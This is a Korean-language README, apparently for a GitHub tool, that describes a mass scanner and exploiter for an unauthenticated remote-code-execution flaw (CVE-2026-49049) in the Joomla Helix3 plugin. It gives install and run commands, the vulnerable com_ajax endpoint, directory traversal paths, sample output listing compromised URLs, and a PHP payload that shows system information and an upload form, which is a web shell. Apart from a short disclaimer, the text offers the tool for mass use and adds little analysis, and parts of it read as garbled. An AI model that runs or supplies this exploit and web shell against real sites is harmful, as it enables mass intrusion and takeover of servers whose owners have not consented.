
대규모 취약점 스캐너 for CVE-2026-49049 – Joomla Helix3 플러그인의 인증되지 않은 원격 코드 실행. 멀티스레드 방식으로, 실행된 PHP 페이로드와 원시 PHP 페이로드를 모두 탐지합니다.
CVE-2026-49049용 대량 취약점 스캐너 - Joomla Helix3 프레임워크의 인증되지 않은 원격 코드 실행.
이 도구는 Helix3 플러그인에서 발견된 CVE-2026-49049 취약점에 대해 여러 Joomla 사이트를 검사합니다. 이 취약점을 통해 인증되지 않은 공격자가 대상 서버에 임의의 PHP 코드를 업로드하고 실행할 수 있습니다.
스캐너는 다음을 시도합니다:
helix3 플러그인과 함께 com_ajax 엔드포인트를 악용합니다.requests 라이브러리pip install requests
🛠 설치
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 사용법
python2 cve-2026-49049.py targets.txt
입력 형식
targets.txt의 각 줄에는 도메인 또는 IP 하나를 포함해야 합니다:
example.com
https://example.com
http://192.168.1.100
출력 파일
파일 설명 results.txt 페이로드가 실행된 취약한 URL rez.txt 페이로드가 업로드되었지만 실행되지 않은 URL(원시 PHP)
출력 예시
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ 구성
스크립트 내에서 다음 변수를 조정할 수 있습니다:
변수 기본값 설명 THREADS 20 동시 스레드 수 PATHS ['../../../', '../../../../'] 디렉터리 트래버설 경로 TIMEOUT 5 HTTP 요청 타임아웃 RESULT_FILE 'results.txt' 취약한 사이트용 출력 파일 RAW_RESULT_FILE 'rez.txt' 원시 PHP 사이트용 출력 파일
🧠 작동 방식
스크립트는 다음 주소로 POST 요청을 전송합니다:
/index.php?option=com_ajax&plugin=helix3&format=json
다음 작업을 수행하는 페이로드와 함께:
그런 다음 파일에 접근할 수 있는지, PHP 코드가 실행되는지 아니면 일반 텍스트로만 표시되는지 확인합니다.
페이로드 예시
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ 면책 조항
이 도구는 교육 및 승인된 테스트 목적으로만 사용하십시오.
소유하지 않았거나 명시적인 테스트 허가를 받지 않은 시스템에 대해 이 도구를 무단으로 사용하는 것은 불법입니다. 작성자는 이 도구로 인한 오용이나 피해에 대해 책임을 지지 않습니다.
추가 면책 조항 Jenderal92의 표지에서 면책 조항을 확인할 수 있습니다. 여기에서 확인하세요!!!